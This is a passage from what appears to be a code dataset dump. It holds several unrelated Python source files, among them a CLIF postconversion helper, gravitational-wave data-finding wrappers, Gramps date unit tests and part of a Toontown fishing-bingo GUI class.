code
stringlengths
3
1.05M
repo_name
stringlengths
5
104
path
stringlengths
4
251
language
stringclasses
1 value
license
stringclasses
15 values
size
int64
3
1.05M
# Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Prepare postconversions for Clif_PyObjFrom. For each cpp_type conversion Clif_PyObjFrom(cpp_type, py::PostConv(conv_array, array_len, template)) call we prepare the template with ConversionTemplate after we transformed the type postconversion map from AST into indexes to the generated conv_array. The len is the same as the map. Example: postconversion = {'str': 'BytesToUnicode', 'ztype': 'AnotherConversion'} GenPostConvTable() generates #define _0 py::postconv::PASS #define _1 BytesToUnicode #define _2 AnotherConversion and transform the postconversion to {'str': 1, 'ztype': 2}. Now Initializer() will translate lang_type to template string as int -> {} str -> _1 list<int> -> {} list<str> -> {_1} dict<int, pair<str, ztype>> -> {_0,{_1,_2}} """ PASS = '{}' # Hard-coded for now. We may want to generalize this in the future, but not # until after finishing the pybind11 integration. MARKED_NON_RAISING_SUPPORTED_TYPES = ( '::clif_testing::TestNonRaising', '::absl::Status', ) def GenPostConvTable(postconv_types): """Transform postconv_types dict(typename: convfunctionname) and yields it.""" size = len(postconv_types) if size: yield '' yield '#define _0 py::postconv::PASS' # We need to sort for deterministic output. for index, pytype in enumerate(sorted(postconv_types), 1): size -= 1 yield '#define _%d ' % index + postconv_types[pytype] postconv_types[pytype] = '_%d' % index def Initializer(ast_type, postconv_types_index_map, nested=False, marked_non_raising=False): """Tranform [complex] ast_type to a postconversion initializer_list.""" if ast_type.HasField('callable'): # TODO: Fix postconv for callable. # print ast_type return PASS if (marked_non_raising and ast_type.cpp_type in MARKED_NON_RAISING_SUPPORTED_TYPES): return 'py::postconv::MarkedNonRaising' if not postconv_types_index_map: return PASS if ast_type.params: # container type index = '{%s}' % ','.join( Initializer(t, postconv_types_index_map, nested=True) for t in ast_type.params) else: index = postconv_types_index_map.get(ast_type.lang_type, '_0') # If no table-based conversions needed, return "no_conversion". return index if nested or index.strip('{_0,}') else PASS
google/clif
clif/python/postconv.py
Python
apache-2.0
2,878
from sys import argv #Author : Satheesh Gopalan # LIST TO TAKE IN ALL ARGUMENT INTO THE LIST 'S' s = [] s = argv # PRINT THE NUMBER OF ARGUMENTS print 'Number of arugment were : ' + str(len(s)) # PRINT THE ARGUMENTS for i in range(len(s)): print "Arg [" + str(i) + "]: " + str(s[i])
satheeshgopalan/python
take_arg_print_arg.py
Python
mit
287
# coding=utf-8 # Copyright (C) Duncan Macleod (2015) # # This file is part of the GW DetChar python package. # # GW DetChar is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # GW DetChar is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GW DetChar. If not, see <http://www.gnu.org/licenses/>. """gw_data_find wrappers """ import re import warnings from six.moves.urllib.error import HTTPError try: # python >= 3 from json.decoder import JSONDecodeError except ImportError: # python == 2.7 JSONDecodeError = ValueError import gwdatafind from ..const import DEFAULT_SEGMENT_SERVER from gwpy.io import gwf as io_gwf from gwpy.segments import (Segment, DataQualityFlag) from gwpy.timeseries import (TimeSeries, TimeSeriesDict) __author__ = 'Duncan Macleod <[email protected]>' __credits__ = 'Alex Urban <[email protected]>' # -- utilities ---------------------------------------------------------------- def check_flag(flag, gpstime, duration, pad): """Check that a state flag is active during an entire analysis segment Parameters ---------- flag : `str` state flag to check gpstime : `float` GPS time of required data duration : `float` duration (in seconds) of required data pad : `float` amount of extra data to read in at the start and end for filtering Returns ------- check : `bool` Boolean switch to pass (`True`) or fail (`False`) depending on whether the given flag is active """ # set GPS start and end time start = gpstime - duration/2. - pad end = gpstime + duration/2. + pad seg = Segment(start, end) # query for state segments active = DataQualityFlag.query(flag, start, end, url=DEFAULT_SEGMENT_SERVER).active # check that state flag is active during the entire analysis if (not active.intersects_segment(seg)) or (abs(active[0]) < abs(seg)): return False return True def remove_missing_channels(channels, gwfcache): """Find and remove channels from a given list that are not available in a given cache of frame files Parameters ---------- channels : `list` of `str` list of requested channels gwfcache : `list` of `str` list of paths to .gwf files Returns ------- keep : `list` of `str` list of common channels found in the first and last files in the cache Notes ----- As a shorthand, this utility checks `channels` against only the first and last frame files in `gwfcache`. This saves time and memory by not loading tables of contents for large numbers of very long data files. For every channel requested that is not available in `gwfcache`, a `UserWarning` will be raised. See Also -------- gwpy.io.gwf.iter_channel_names for the utility used to identify frame contents """ # get available channels from the first and last frame file available = set(io_gwf.iter_channel_names(gwfcache[0])) if len(gwfcache) > 1: available.intersection_update(io_gwf.iter_channel_names(gwfcache[-1])) # work out which channels to keep, and which to reject channels = set(channels) keep = channels & available reject = channels - keep for channel in reject: warnings.warn( '{} is being removed because it was not available in all ' 'requested files'.format(channel), UserWarning) return list(keep) def get_data(channel, start, end, frametype=None, source=None, nproc=1, verbose=False, **kwargs): """Retrieve data for given channels within a certain time range Parameters ---------- channel : `str` or `list` either a single channel name, or a list of channel names start : `float` GPS start time of requested data end : `float` GPS end time of requested data frametype : `str`, optional name of frametype in which channel(s) are stored, default: `None` source : `str`, `list`, optional path(s) of a LAL-format cache file or individual data file, default: `None` nproc : `int`, optional number of parallel processes to use, uses serial process by default verbose : `bool`, optional print verbose output about NDS progress, default: False **kwargs : `dict`, optional additional keyword arguments to `~gwpy.timeseries.TimeSeries.read` or `~gwpy.timeseries.TimeSeries.get` Returns ------- data : `~gwpy.timeseries.TimeSeries` or `~gwpy.timeseries.TimeSeriesDict` collection of data for the requested channels in the requested time range Notes ----- If `channel` is a `str`, then a `TimeSeries` object will be returned, else the result is a `TimeSeriesDict`. The `frametype` argument should be used to read from archived frame files, while `source` should be used to read from a local cache or specific data file. If either fails, or if neither is passed, this function will attempt to get data over an NDS server. If `frametype` is used to read from the archive, any channels missing from the first or last frame file in the requested time range will be ignored. See Also -------- remove_missing_channels a utility that removes channels missing from the frame archive gwpy.timeseries.TimeSeries.get the underlying method to read data over an NDS server gwpy.timeseries.TimeSeries.read the underlying method to read data from local files """ # get TimeSeries class if isinstance(channel, (list, tuple)): series_class = TimeSeriesDict else: series_class = TimeSeries if frametype is not None: try: # locate frame files ifo = re.search('[A-Z]1', frametype).group(0) obs = ifo[0] source = gwdatafind.find_urls(obs, frametype, start, end) except AttributeError: raise AttributeError( 'Could not determine observatory from frametype') except (HTTPError, JSONDecodeError): # frame files not found pass if isinstance(source, list) and isinstance(channel, (list, tuple)): channel = remove_missing_channels(channel, source) if source is not None: # read from frame files return series_class.read( source, channel, start=start, end=end, nproc=nproc, verbose=verbose, **kwargs) # read single channel from NDS if not isinstance(channel, (list, tuple)): return series_class.get( channel, start, end, verbose=verbose, **kwargs) # if all else fails, process channels in groups of 60 data = series_class() for group in [channel[i:i + 60] for i in range(0, len(channel), 60)]: data.append(series_class.get( group, start, end, verbose=verbose, **kwargs)) return data
lscsoft/gwdetchar
gwdetchar/io/datafind.py
Python
gpl-3.0
7,423
# -*- coding: UTF-8 -*- SSSA_LOG = "/var/log/sssa.log" CONFIG_INI = '/etc/sssa.conf' CONFIG_DEFAUTLS = {'host': 'localhost', 'port': '8125', # 'prefix': 'sssa', 'group': 'servers', 'hostname': '____', 'period': '30', 'fake': 'true'} DEBUG = False
mariodebian/server-stats-system-agent
sssa/__init__.py
Python
gpl-2.0
382
# -*- coding: utf-8 -*- """ @file @brief quelques fonctions à propos de la première séance """ def commentaire_accentues(): """ L'aide de cette fonction contient assuréments des accents. @FAQ(Python n'accepte pas les accents) Le langage Python a été conçu en langage anglais. Dès qu'on on ajoute un caractère qui ne fait pas partie de l'alphabet anglais (ponctuation comprise), il déclenche une erreur : @code File "faq_cvxopt.py", line 3 SyntaxError: Non-UTF-8 code starting with '\xe8' in file faq_cvxopt.py on line 4, but no encoding declared; see http://python.org/dev/peps/pep-0263/ for details @endcode Pour la résoudre, il faut dire à l'interpréteur que des caractères non anglais peuvent apparaître et écrire sur la première ligne du programme : @code # -*- coding: latin-1 -*- @endcode Ou pour tout caractère y compris chinois : @code # -*- coding: utf-8 -*- @endcode Si vous utilisez l'éditeur `SciTE <http://www.scintilla.org/SciTE.html>`_ sous Windows, après avoir ajouté cette ligne avec l'encoding `utf-8`, il est conseillé de fermer le fichier puis de le réouvrir. SciTE le traitera différemment. @endFAQ """ pass
sdpython/pyquickhelper
_unittests/ut_sphinxext/data/session1.py
Python
mit
1,282
# # Gramps - a GTK+/GNOME based genealogy program # # Copyright (C) 2007 Donald N. Allingham # Copyright (C) 2013-2014 Vassilii Khachaturov # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # """ Unittest for testing dates """ #------------------------------------------------------------------------- # # Standard python modules # #------------------------------------------------------------------------- import unittest #------------------------------------------------------------------------- # # Gramps modules # #------------------------------------------------------------------------- from ...config import config from ...datehandler import get_date_formats, set_format from ...datehandler import parser as _dp from ...datehandler import displayer as _dd from ...datehandler._datedisplay import DateDisplayEn from ...lib.date import Date, DateError, Today, calendar_has_fixed_newyear date_tests = {} # first the "basics". testset = "basic test" dates = [] calendar = Date.CAL_GREGORIAN for quality in (Date.QUAL_NONE, Date.QUAL_ESTIMATED, Date.QUAL_CALCULATED): for modifier in (Date.MOD_NONE, Date.MOD_BEFORE, Date.MOD_AFTER, Date.MOD_ABOUT): for month in range(1,13): d = Date() d.set(quality,modifier,calendar,(4,month,1789,False),"Text comment") dates.append( d) for modifier in (Date.MOD_RANGE, Date.MOD_SPAN): for month1 in range(1,13): for month2 in range(1,13): d = Date() d.set(quality,modifier,calendar,(4,month1,1789,False,5,month2,1876,False),"Text comment") dates.append( d) modifier = Date.MOD_TEXTONLY d = Date() d.set(quality,modifier,calendar,Date.EMPTY,"This is a textual date") dates.append( d) date_tests[testset] = dates # incomplete dates (day or month missing) testset = "partial date" dates = [] calendar = Date.CAL_GREGORIAN for quality in (Date.QUAL_NONE, Date.QUAL_ESTIMATED, Date.QUAL_CALCULATED): for modifier in (Date.MOD_NONE, Date.MOD_BEFORE, Date.MOD_AFTER, Date.MOD_ABOUT): d = Date() d.set(quality,modifier,calendar,(0,11,1789,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(0,0,1789,False),"Text comment") dates.append( d) for modifier in (Date.MOD_RANGE, Date.MOD_SPAN): d = Date() d.set(quality,modifier,calendar,(4,10,1789,False,0,11,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(4,10,1789,False,0,0,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(0,10,1789,False,5,11,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(0,10,1789,False,0,11,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(0,10,1789,False,0,0,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(0,0,1789,False,5,11,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(0,0,1789,False,0,11,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(0,0,1789,False,0,0,1876,False),"Text comment") dates.append( d) date_tests[testset] = dates # slash-dates testset = "slash-dates" dates = [] calendar = Date.CAL_GREGORIAN for quality in (Date.QUAL_NONE, Date.QUAL_ESTIMATED, Date.QUAL_CALCULATED): for modifier in (Date.MOD_NONE, Date.MOD_BEFORE, Date.MOD_AFTER, Date.MOD_ABOUT): # normal date d = Date() d.set(quality,modifier,calendar,(4,11,1789,True),"Text comment") dates.append( d) for modifier in (Date.MOD_RANGE, Date.MOD_SPAN): d = Date() d.set(quality,modifier,calendar,(4,11,1789,True,5,10,1876,False),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(4,11,1789,False,5,10,1876,True),"Text comment") dates.append( d) d = Date() d.set(quality,modifier,calendar,(4,11,1789,True,5,10,1876,True),"Text comment") dates.append( d) date_tests[testset] = dates # BCE testset = "B. C. E." dates = [] calendar = Date.CAL_GREGORIAN for quality in (Date.QUAL_NONE, Date.QUAL_ESTIMATED, Date.QUAL_CALCULATED): for modifier in (Date.MOD_NONE, Date.MOD_BEFORE, Date.MOD_AFTER, Date.MOD_ABOUT): # normal date d = Date() d.set(quality,modifier,calendar,(4,11,-90,False),"Text comment") dates.append( d) for modifier in (Date.MOD_RANGE, Date.MOD_SPAN): d = Date() d.set(quality,modifier,calendar,(5,10,-90,False,4,11,-90,False),"Text comment") dates.append( d) d = Date() date_tests[testset] = dates # test for all other different calendars testset = "Non-gregorian" dates = [] for calendar in (Date.CAL_JULIAN, Date.CAL_HEBREW, Date.CAL_ISLAMIC, Date.CAL_FRENCH, Date.CAL_PERSIAN, ): for quality in (Date.QUAL_NONE, Date.QUAL_ESTIMATED, Date.QUAL_CALCULATED): for modifier in (Date.MOD_NONE, Date.MOD_BEFORE, Date.MOD_AFTER, Date.MOD_ABOUT): d = Date() d.set(quality,modifier,calendar,(4,11,1789,False),"Text comment") dates.append( d) for modifier in (Date.MOD_RANGE, Date.MOD_SPAN): d = Date() d.set(quality,modifier,calendar,(4,10,1789,False,5,11,1876,False),"Text comment") dates.append( d) # CAL_SWEDISH - Swedish calendar 1700-03-01 -> 1712-02-30! class Context: def __init__(self, retval): self.retval = retval def __enter__(self): return self.retval def __exit__(self, *args, **kwargs): pass with Context(Date.CAL_SWEDISH) as calendar: for quality in (Date.QUAL_NONE, Date.QUAL_ESTIMATED, Date.QUAL_CALCULATED): for modifier in (Date.MOD_NONE, Date.MOD_BEFORE, Date.MOD_AFTER, Date.MOD_ABOUT): d = Date() d.set(quality,modifier,calendar,(4,11,1700,False),"Text comment") dates.append( d) for modifier in (Date.MOD_RANGE, Date.MOD_SPAN): d = Date() d.set(quality,modifier,calendar,(4,10,1701,False, 5,11,1702,False),"Text comment") dates.append( d) quality = Date.QUAL_NONE modifier = Date.MOD_NONE for calendar in (Date.CAL_JULIAN, Date.CAL_ISLAMIC, Date.CAL_PERSIAN, ): for month in range(1,13): d = Date() d.set(quality,modifier,calendar,(4,month,1789,False),"Text comment") dates.append( d) for calendar in (Date.CAL_HEBREW, Date.CAL_FRENCH): for month in range(1,14): d = Date() d.set(quality,modifier,calendar,(4,month,1789,False),"Text comment") dates.append( d) date_tests[testset] = dates swedish_dates = [] # CAL_SWEDISH - Swedish calendar 1700-03-01 -> 1712-02-30! with Context(Date.CAL_SWEDISH) as calendar: for year in range(1701, 1712): for month in range(1,13): d = Date() d.set(quality,modifier,calendar,(4,month,year,False),"Text comment") swedish_dates.append( d) #------------------------------------------------------------------------- # # BaseDateTest # #------------------------------------------------------------------------- class BaseDateTest(unittest.TestCase): """ Base class for all date tests. """ def setUp(self): config.set('behavior.date-before-range', 9999) config.set('behavior.date-after-range', 9999) config.set('behavior.date-about-range', 10) #------------------------------------------------------------------------- # # ParserDateTest # #------------------------------------------------------------------------- class ParserDateTest(BaseDateTest): """ Date displayer and parser tests. """ def do_case(self, testset): for date_format in range(len(get_date_formats())): set_format(date_format) for dateval in date_tests[testset]: datestr = _dd.display(dateval) ndate = _dp.parse(datestr) self.assertTrue(dateval.is_equal(ndate), "dateval fails is_equal in format %d:\n" " '%s' != '%s'\n" " '%s' != '%s'\n" % (date_format, dateval, ndate, dateval.__dict__, ndate.__dict__)) def test_basic(self): self.do_case("basic test") def test_partial(self): self.do_case("partial date") def test_slash(self): self.do_case("slash-dates") def test_bce(self): self.do_case("B. C. E.") def test_non_gregorian(self): self.do_case("Non-gregorian") #------------------------------------------------------------------------- # # MatchDateTest # #------------------------------------------------------------------------- ENGLISH_DATE_HANDLER = (_dd.__class__ == DateDisplayEn) @unittest.skipUnless(ENGLISH_DATE_HANDLER, "This test of Date() matching logic can only run in English locale.") class MatchDateTest(BaseDateTest): """ Date match tests. """ tests = [("before 1960", "before 1961", True), ("before 1960", "before 1960", True), ("before 1961", "before 1961", True), ("jan 1, 1960", "jan 1, 1960", True), ("dec 31, 1959", "dec 31, 1959", True), ("before 1960", "jan 1, 1960", False), ("before 1960", "dec 31, 1959", True), ("abt 1960", "1960", True), ("abt 1960", "before 1960", True), ("1960", "1960", True), ("1960", "after 1960", False), ("1960", "before 1960", False), ("abt 1960", "abt 1960", True), ("before 1960", "after 1960", False), ("after jan 1, 1900", "jan 2, 1900", True), ("abt jan 1, 1900", "jan 1, 1900", True), ("from 1950 to 1955", "1950", True), ("from 1950 to 1955", "1951", True), ("from 1950 to 1955", "1952", True), ("from 1950 to 1955", "1953", True), ("from 1950 to 1955", "1954", True), ("from 1950 to 1955", "1955", True), ("from 1950 to 1955", "1956", False), ("from 1950 to 1955", "dec 31, 1955", True), ("from 1950 to 1955", "jan 1, 1955", True), ("from 1950 to 1955", "dec 31, 1949", False), ("from 1950 to 1955", "jan 1, 1956", False), ("after jul 4, 1980", "jul 4, 1980", False), ("after jul 4, 1980", "before jul 4, 1980", False), ("after jul 4, 1980", "about jul 4, 1980", True), ("after jul 4, 1980", "after jul 4, 1980", True), ("between 1750 and 1752", "1750", True), ("between 1750 and 1752", "about 1750", True), ("between 1750 and 1752", "between 1749 and 1750", True), ("between 1750 and 1752", "1749", False), ("invalid date", "invalid date", True), ("invalid date", "invalid", False, True), ("invalid date 1", "invalid date 2", False), ("abt jan 1, 2000", "dec 31, 1999", True), ("jan 1, 2000", "dec 31, 1999", False), ("aft jan 1, 2000", "dec 31, 1999", False), ("after jan 1, 2000", "after dec 31, 1999", True), ("after dec 31, 1999", "after jan 1, 2000", True), ("1 31, 2000", "jan 1, 2000", False), ("dec 31, 1999", "jan 1, 2000", False), ("jan 1, 2000", "before dec 31, 1999", False), ("aft jan 1, 2000", "before dec 31, 1999", False), ("before jan 1, 2000", "after dec 31, 1999", False), ("jan 1, 2000/1", "jan 1, 2000", False), ("jan 1, 2000/1", "jan 1, 2001", False), ("jan 1, 2000/1", "jan 1, 2000/1", True), ("jan 1, 2000/1", "jan 14, 2001", True), ("jan 1, 2000/1", "jan 1, 2001 (julian)", True), ("about 1984", "about 2005", False), ("about 1990", "about 2005", True), ("about 2007", "about 2006", True), ("about 1995", "after 2000", True), ("about 1995", "after 2005", False), ("about 2007", "about 2003", True), ("before 2007", "2000", True), # offsets # different calendar, same date ("1800-8-3", "15 Thermidor 8 (French Republican)", True), ("after 1800-8-3", "before 15 Thermidor 8 (French Republican)", False), ("ab cd", "54 ab cd 2000", True, False), ("1700-02-29 (Julian)", "1700-03-01 (Swedish)", True), ("1706-12-31 (Julian)", "1707-01-01 (Swedish)", True), ("1712-02-28 (Julian)", "1712-02-29 (Swedish)", True), ("1712-02-29 (Julian)", "1712-02-30 (Swedish)", True), # See bug# 7100 ("1233-12-01", "1234-12-01 (Mar25)", True), ("1234-01-04", "1234-01-04 (Mar25)", True), # See bug# 7158 # Some issues passing Travis close to midnight; not sure why: # ("today", Today(), True), # ("today (Hebrew)", Today(), True), ("today", "today", True), (Today(), Today(), True), # See bug# 7197 ("1788-03-27", "1789-03-27 (Mar25)", True), ("1788-03-27 (Julian)", "1789-03-27 (Julian, Mar25)", True), ] def convert_to_date(self, d): return d if isinstance(d,Date) else _dp.parse(d) def do_case(self, d1, d2, expected1, expected2=None): """ Tests two Gramps dates to see if they match. """ if expected2 is None: expected2 = expected1 self.assertMatch(d1, d2, expected1) self.assertMatch(d2, d1, expected2) def assertMatch(self, d1, d2, expected): date1 = self.convert_to_date(d1) date2 = self.convert_to_date(d2) result = date2.match(date1) self.assertEqual(result, expected, "'{}' {} '{}'\n({} vs {})".format( d1, ("did not match" if expected else "matched"), d2, date1.__dict__, date2.__dict__)) def test_match(self): for testdata in self.tests: self.do_case(*testdata) #------------------------------------------------------------------------- # # ArithmeticDateTest # #------------------------------------------------------------------------- class ArithmeticDateTest(BaseDateTest): """ Date arithmetic tests. """ tests = [ # Date +/- int/tuple -> Date ("Date(2008, 1, 1) - 1", "Date(2007, 1, 1)"), ("Date(2008, 1, 1) + 1", "Date(2009, 1, 1)"), ("Date(2008, 1, 1) - (0,0,1)", "Date(2007, 12, 31)"), ("Date(2008, 1, 1) - (0,0,2)", "Date(2007, 12, 30)"), ("Date(2008) - (0,0,1)", "Date(2007, 12, 31)"), ("Date(2008) - 1", "Date(2007, 1, 1)"), ("Date(2008, 12, 31) + (0, 0, 1)", "Date(2009, 1, 1)"), ("Date(2000,1,1) - (0,11,0)", "Date(1999, 2, 1)"), ("Date(2000,1,1) - (0,1,0)", "Date(1999, 12, 1)"), ("Date(2008, 1, 1) + (0, 0, 32)", "Date(2008, 2, 2)"), ("Date(2008, 2, 1) + (0, 0, 32)", "Date(2008, 3, 4)"), ("Date(2000) - (0, 1, 0)", "Date(1999, 12, 1)"), ("Date(2000) + (0, 1, 0)", "Date(2000, 1, 0)"), # Ok? ("Date(2000, 1, 1) - (0, 1, 0)", "Date(1999, 12, 1)"), ("Date(2000, 1, 1) - 1", "Date(1999, 1, 1)"), ("Date(2000) - 1", "Date(1999)"), ("Date(2000) + 1", "Date(2001)"), # Date +/- Date -> Span ("(Date(1876,5,7) - Date(1876,5,1)).tuple()", "(0, 0, 6)"), ("(Date(1876,5,7) - Date(1876,4,30)).tuple()", "(0, 0, 7)"), ("(Date(2000,1,1) - Date(1999,2,1)).tuple()", "(0, 11, 0)"), ("(Date(2000,1,1) - Date(1999,12,1)).tuple()", "(0, 1, 0)"), ("(Date(2007, 12, 23) - Date(1963, 12, 4)).tuple()", "(44, 0, 19)"), ("(Date(1963, 12, 4) - Date(2007, 12, 23)).tuple()", "(-44, 0, -19)"), ] def test_evaluate(self): for exp1, exp2 in self.tests: val1 = eval(exp1) val2 = eval(exp2) self.assertEqual(val1, val2, "'%s' should be '%s' but was '%s'" % (exp1, val2, val1)) #------------------------------------------------------------------------- # # SwedishDateTest # #------------------------------------------------------------------------- class SwedishDateTest(BaseDateTest): """ Swedish calendar tests. """ def test_swedish(self): for date in swedish_dates: self.assertEqual(date.sortval, date.to_calendar('gregorian').sortval) class Test_set2(BaseDateTest): """ Test the Date.set2_... setters -- the ones to manipulate the 2nd date of a compound date """ def setUp(self): self.date = d = Date() d.set(modifier=Date.MOD_RANGE, #d m y sl--d m y sl value=(1, 1, 2000, 0, 1, 1, 2010, 0)) def testStartStopSanity(self): start,stop = self.date.get_start_stop_range() self.assertEqual(start, (2000, 1, 1)) self.assertEqual(stop, (2010, 1, 1)) def test_set2_ymd_overrides_stop_date(self): self.date.set2_yr_mon_day(2013, 2, 2) start,stop = self.date.get_start_stop_range() self.assertEqual(start, (2000, 1, 1)) self.assertEqual(stop, (2013, 2, 2)) def test_set_ymd_overrides_both_dates(self): self.date.set_yr_mon_day(2013, 2, 2, remove_stop_date = True) start,stop = self.date.get_start_stop_range() self.assertEqual(start, stop) self.assertEqual(stop, (2013, 2, 2)) def test_set_ymd_offset_updates_both_ends(self): self.date.set_yr_mon_day_offset(+2, +2, +2) start,stop = self.date.get_start_stop_range() self.assertEqual(start, (2002, 3, 3)) self.assertEqual(stop, (2012, 3, 3)) def test_set2_ymd_offset_updates_stop_date(self): self.date.set2_yr_mon_day_offset(+7, +5, +5) start,stop = self.date.get_start_stop_range() self.assertEqual(start, (2000, 1, 1)) self.assertEqual(stop, (2017, 6, 6)) def test_copy_offset_ymd_preserves_orig(self): copied = self.date.copy_offset_ymd(year=-1) self.testStartStopSanity() start,stop = copied.get_start_stop_range() self.assertEqual(start, (1999, 1, 1)) self.assertEqual(stop, (2009, 1, 1)) def test_copy_ymd_preserves_orig(self): copied = self.date.copy_ymd(year=1000, month=10, day=10, remove_stop_date=True) self.testStartStopSanity() start,stop = copied.get_start_stop_range() self.assertEqual(start, (1000, 10, 10)) self.assertEqual(stop, (1000, 10, 10)) def _test_set2_function_raises_error_unless_compound(self, function): for mod in (Date.MOD_NONE, Date.MOD_BEFORE, Date.MOD_AFTER, Date.MOD_ABOUT, Date.MOD_TEXTONLY): self.date.set_modifier(mod) try: function(self.date) self.assertTrue(False, "Modifier: {}, dateval: {} - exception expected!".format( mod, self.date.dateval)) except DateError: pass def test_set2_ymd_raises_error_unless_compound(self): self._test_set2_function_raises_error_unless_compound( lambda date: date.set2_yr_mon_day(2013, 2, 2)) def test_set2_ymd_offset_raises_error_unless_compound(self): self._test_set2_function_raises_error_unless_compound( lambda date: date.set2_yr_mon_day_offset(year=-1)) class Test_set_newyear(BaseDateTest): def test_raises_error_iff_calendar_has_fixed_newyear(self): for cal in Date.CALENDARS: d = Date(1111,2,3) should_raise = calendar_has_fixed_newyear(cal) message = "{name} {cal}".format( name = Date.calendar_names[cal], cal = cal) try: d.set(calendar=cal, newyear=2) self.assertFalse(should_raise, message) except DateError: self.assertTrue(should_raise, message) #------------------------------------------------------------------------- # # EmptyDateTest # #------------------------------------------------------------------------- class EmptyDateTest(BaseDateTest): """ Tests for empty dates. """ def test_empty(self): d = Date() self.assertTrue(d.is_empty()) def test_text_only_empty(self): d = Date() d.set(text='First of Jan', modifier=Date.MOD_TEXTONLY) self.assertFalse(d.is_empty()) def test_single_empty(self): d = Date() d.set(value=(1, 1, 1900, False), modifier=Date.MOD_NONE) self.assertFalse(d.is_empty()) def test_range_empty(self): d = Date() d.set(value=(1, 1, 1900, False, 1, 1, 1910, False), modifier=Date.MOD_RANGE) self.assertFalse(d.is_empty()) def test_span_empty(self): d = Date() d.set(value=(1, 1, 1900, False, 1, 1, 1910, False), modifier=Date.MOD_SPAN) self.assertFalse(d.is_empty()) if __name__ == "__main__": unittest.main()
SNoiraud/gramps
gramps/gen/lib/test/date_test.py
Python
gpl-2.0
22,594
from direct.directnotify import DirectNotifyGlobal from direct.gui.DirectGui import * from pandac.PandaModules import * from direct.task import Task import random from toontown.fishing import BingoCardCell from toontown.fishing import BingoGlobals from toontown.fishing import FishBase from toontown.fishing import FishGlobals from direct.showbase import RandomNumGen from toontown.toonbase import ToontownGlobals from toontown.toonbase import ToontownTimer from toontown.toonbase import TTLocalizer from toontown.toontowngui import TTDialog BG = BingoGlobals class BingoCardGui(DirectFrame): notify = DirectNotifyGlobal.directNotify.newCategory('BingoCardGui') def __init__(self, parent = aspect2d, **kw): self.notify.debug('Bingo card initialized') self.model = loader.loadModel('phase_4/models/gui/FishBingo') optiondefs = (('relief', None, None), ('state', DGG.NORMAL, None), ('image', self.model.find('**/g'), None), ('image_color', BG.getColor(0), None), ('image_scale', BG.CardImageScale, None), ('image_hpr', (0.0, 90.0, 0.0), None), ('pos', BG.CardPosition, None)) self.defineoptions(kw, optiondefs) DirectFrame.__init__(self, parent) self.initialiseoptions(BingoCardGui) self.game = None self.cellGuiList = [] self.parent = parent self.load() self.hide() self.taskNameFlashFish = 'flashMatchingFishTask' return def show(self): DirectFrame.show(self) if self.game and self.game.checkForBingo(): self.__indicateBingo(True) if self.game.getGameType() == BG.BLOCKOUT_CARD: self.showJackpot() def hide(self): self.hideTutorial() self.hideJackpot() DirectFrame.hide(self) def loadGameTimer(self): self.timer = ToontownTimer.ToontownTimer() self.timer.reparentTo(self) self.timer.setScale(0.17) self.timer.setPos(0.24, 0, -0.18) def resetGameTimer(self): self.timer.reset() def startGameCountdown(self, time): self.notify.debug('startGameCountdown: %s' % time) self.timer.countdown(time) def startNextGameCountdown(self, time): self.nextGameTimer.countdown(time) def hideNextGameTimer(self): self.nextGame['text'] = '' self.nextGame.hide() def showNextGameTimer(self, text): self.nextGame['text'] = text self.nextGame.show() def resetNextGameTimer(self): self.nextGameTimer.reset() def stopNextGameTimer(self): self.nextGameTimer.stop() def setNextGameText(self, text): self.nextGame['text'] = text def setJackpotText(self, text): if text: str = TTLocalizer.FishBingoJackpotWin % text else: str = '' self.jpText['text'] = str def resetGameTypeText(self): self.gameType['text'] = '' self.gameType.setFrameSize() self.gameType.hide() def loadNextGameTimer(self): self.nextGame = DirectLabel(parent=self, relief=None, text='', text_font=ToontownGlobals.getSignFont(), text_scale=TTLocalizer.BCGnextGame * BG.CardImageScale[2], text_fg=(1.0, 1.0, 1.0, 1), pos=(BG.GridXOffset, 0, 4 * BG.CardImageScale[2])) self.nextGameTimer = ToontownTimer.ToontownTimer() self.nextGameTimer.reparentTo(self.nextGame) self.nextGameTimer.setPos(0, 0, -5 * BG.CardImageScale[2]) self.nextGameTimer.setProp('image', None) self.nextGameTimer.setProp('text_font', ToontownGlobals.getSignFont()) self.nextGameTimer.setProp('text_scale', 0.2 * BG.CardImageScale[2]) self.nextGameTimer.setFontColor(Vec4(1.0, 1.0, 1.0, 1)) return def setGameOver(self, text): self.gameOver['text'] = text def load(self): self.notify.debug('Bingo card loading') self.loadGameTimer() self.loadNextGameTimer() textScale = 0.06 textHeight = 0.38 * BG.CardImageScale[2] guiButton = loader.loadModel('phase_3/models/gui/quit_button') self.bingo = DirectButton(parent=self, pos=(BG.GridXOffset, 0, 0.305), scale=(0.0343, 0.035, 0.035), relief=None, state=DGG.DISABLED, geom=self.model.find('**/BINGObutton'), geom_pos=(0, 0, 0), geom_hpr=(0, 